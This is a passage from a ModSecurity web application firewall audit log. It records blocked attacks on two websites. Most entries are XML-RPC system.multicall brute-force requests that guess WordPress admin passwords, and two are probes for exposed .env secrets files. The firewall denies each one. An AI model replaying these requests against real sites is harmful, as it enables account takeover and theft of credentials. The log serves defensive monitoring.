"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (2+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104166335245 5108 (- - -) Stopwatch2: 1749104166335245 5108; combined=3649, p1=431, p2=3068, p3=0, p4=0, p5=88, sr=76, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --583d2d65-Z-- --6ae7d77c-A-- [05/Jun/2025:13:16:07 +0700] aEE2J-th7G2xELALzPYjMQAAAMU 103.236.140.4 37376 103.236.140.4 8181 --6ae7d77c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6ae7d77c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh0000 --6ae7d77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae7d77c-E-- --6ae7d77c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104167635458 6341 (- - -) Stopwatch2: 1749104167635458 6341; combined=4396, p1=528, p2=3688, p3=0, p4=0, p5=109, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae7d77c-Z-- --400e0321-A-- [05/Jun/2025:13:16:33 +0700] aEE2QSrHpfaS2Cuwh8XUkwAAAFE 103.236.140.4 37392 103.236.140.4 8181 --400e0321-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --400e0321-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin87 --400e0321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400e0321-E-- --400e0321-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104193311055 5344 (- - -) Stopwatch2: 1749104193311055 5344; combined=3916, p1=494, p2=3255, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --400e0321-Z-- --9cb8047e-A-- [05/Jun/2025:13:16:54 +0700] aEE2VirHpfaS2Cuwh8XUlAAAAFA 103.236.140.4 37396 103.236.140.4 8181 --9cb8047e-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Accept-Charset: utf-8 Cookie: X-Forwarded-For: 91.206.169.53 Accept-Encoding: gzip X-Varnish: 172603810 --9cb8047e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9cb8047e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749104214268703 765 (- - -) Stopwatch2: 1749104214268703 765; combined=292, p1=257, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cb8047e-Z-- --ed414654-A-- [05/Jun/2025:13:17:18 +0700] aEE2buth7G2xELALzPYjNQAAAMk 103.236.140.4 37400 103.236.140.4 8181 --ed414654-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed414654-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin3 --ed414654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed414654-E-- --ed414654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104238468098 5851 (- - -) Stopwatch2: 1749104238468098 5851; combined=4188, p1=542, p2=3471, p3=0, p4=0, p5=103, sr=103, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed414654-Z-- --303c827c-A-- [05/Jun/2025:13:17:48 +0700] aEE2jH-K7ToMdu-YSIIkqwAAABA 103.236.140.4 37418 103.236.140.4 8181 --303c827c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --303c827c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin$$ --303c827c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --303c827c-E-- --303c827c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104268883894 5880 (- - -) Stopwatch2: 1749104268883894 5880; combined=4135, p1=525, p2=3432, p3=0, p4=0, p5=105, sr=92, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303c827c-Z-- --ad6df302-A-- [05/Jun/2025:13:22:15 +0700] aEE3lyrHpfaS2Cuwh8XUuQAAAFE 103.236.140.4 37524 103.236.140.4 8181 --ad6df302-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ad6df302-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin25 --ad6df302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad6df302-E-- --ad6df302-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104535345397 5739 (- - -) Stopwatch2: 1749104535345397 5739; combined=4313, p1=507, p2=3635, p3=0, p4=0, p5=101, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6df302-Z-- --4db46a15-A-- [05/Jun/2025:13:24:27 +0700] aEE4G3-K7ToMdu-YSIIktgAAAAI 103.236.140.4 37560 103.236.140.4 8181 --4db46a15-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4db46a15-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin.2020 --4db46a15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4db46a15-E-- --4db46a15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104667067183 5531 (- - -) Stopwatch2: 1749104667067183 5531; combined=3966, p1=451, p2=3292, p3=0, p4=0, p5=142, sr=90, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4db46a15-Z-- --2303a653-A-- [05/Jun/2025:13:25:58 +0700] aEE4duth7G2xELALzPYjSAAAAMk 103.236.140.4 37600 103.236.140.4 8181 --2303a653-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2303a653-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh1111 --2303a653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2303a653-E-- --2303a653-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104758327865 5044 (- - -) Stopwatch2: 1749104758327865 5044; combined=3793, p1=464, p2=3164, p3=0, p4=0, p5=96, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2303a653-Z-- --abc9ed37-A-- [05/Jun/2025:13:26:13 +0700] aEE4hOth7G2xELALzPYjSwAAAMo 103.236.140.4 37610 103.236.140.4 8181 --abc9ed37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --abc9ed37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh1111 --abc9ed37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc9ed37-E-- --abc9ed37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104772999131 4904 (- - -) Stopwatch2: 1749104772999131 4904; combined=3630, p1=438, p2=3031, p3=0, p4=0, p5=95, sr=80, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc9ed37-Z-- --303fb343-A-- [05/Jun/2025:13:27:17 +0700] aEE4xSrHpfaS2Cuwh8XUzwAAAFg 103.236.140.4 37662 103.236.140.4 8181 --303fb343-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --303fb343-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh92 --303fb343-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --303fb343-E-- --303fb343-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749104837919743 4713 (- - -) Stopwatch2: 1749104837919743 4713; combined=3577, p1=396, p2=3014, p3=0, p4=0, p5=97, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303fb343-Z-- --694c1004-A-- [05/Jun/2025:13:29:47 +0700] aEE5WyrHpfaS2Cuwh8XU3QAAAFc 103.236.140.4 37736 103.236.140.4 8181 --694c1004-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 95.217.221.92 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.2535.87 Accept: */* Cookie: X-Forwarded-For: 95.217.221.92 Accept-Encoding: gzip X-Varnish: 173867889 --694c1004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --694c1004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749104987565908 591 (- - -) Stopwatch2: 1749104987565908 591; combined=267, p1=230, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --694c1004-Z-- --738e7759-A-- [05/Jun/2025:13:31:29 +0700] aEE5wVwdJdhOudw5hdzPkQAAAIU 103.236.140.4 37804 103.236.140.4 8181 --738e7759-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --738e7759-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1985 --738e7759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --738e7759-E-- --738e7759-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105089149409 5821 (- - -) Stopwatch2: 1749105089149409 5821; combined=4120, p1=494, p2=3453, p3=0, p4=0, p5=102, sr=87, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738e7759-Z-- --88ebff30-A-- [05/Jun/2025:13:32:45 +0700] aEE6DX-K7ToMdu-YSIIk0QAAABQ 103.236.140.4 37834 103.236.140.4 8181 --88ebff30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --88ebff30-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin07 --88ebff30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88ebff30-E-- --88ebff30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105165405535 6053 (- - -) Stopwatch2: 1749105165405535 6053; combined=4081, p1=492, p2=3412, p3=0, p4=0, p5=106, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88ebff30-Z-- --6a121b5c-A-- [05/Jun/2025:13:35:04 +0700] aEE6mCrHpfaS2Cuwh8XU7wAAAFQ 103.236.140.4 37886 103.236.140.4 8181 --6a121b5c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6a121b5c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@1 --6a121b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a121b5c-E-- --6a121b5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105304584749 5942 (- - -) Stopwatch2: 1749105304584749 5942; combined=4263, p1=533, p2=3427, p3=0, p4=0, p5=197, sr=98, sw=106, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a121b5c-Z-- --485d0a13-A-- [05/Jun/2025:13:36:58 +0700] aEE7CirHpfaS2Cuwh8XU-QAAAEk 103.236.140.4 37972 103.236.140.4 8181 --485d0a13-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --485d0a13-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh98 --485d0a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485d0a13-E-- --485d0a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105418987496 5008 (- - -) Stopwatch2: 1749105418987496 5008; combined=3412, p1=432, p2=2824, p3=0, p4=0, p5=92, sr=87, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485d0a13-Z-- --0c7dfc24-A-- [05/Jun/2025:13:36:59 +0700] aEE7CyrHpfaS2Cuwh8XU-gAAAEo 103.236.140.4 37974 103.236.140.4 8181 --0c7dfc24-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0c7dfc24-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin65 --0c7dfc24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7dfc24-E-- --0c7dfc24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105419652252 4872 (- - -) Stopwatch2: 1749105419652252 4872; combined=3668, 